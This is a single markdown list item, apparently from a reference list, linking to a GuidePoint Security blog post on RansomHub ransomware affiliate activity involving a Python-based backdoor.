- [GuidePoint Security detailing RansomHub observations](https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/)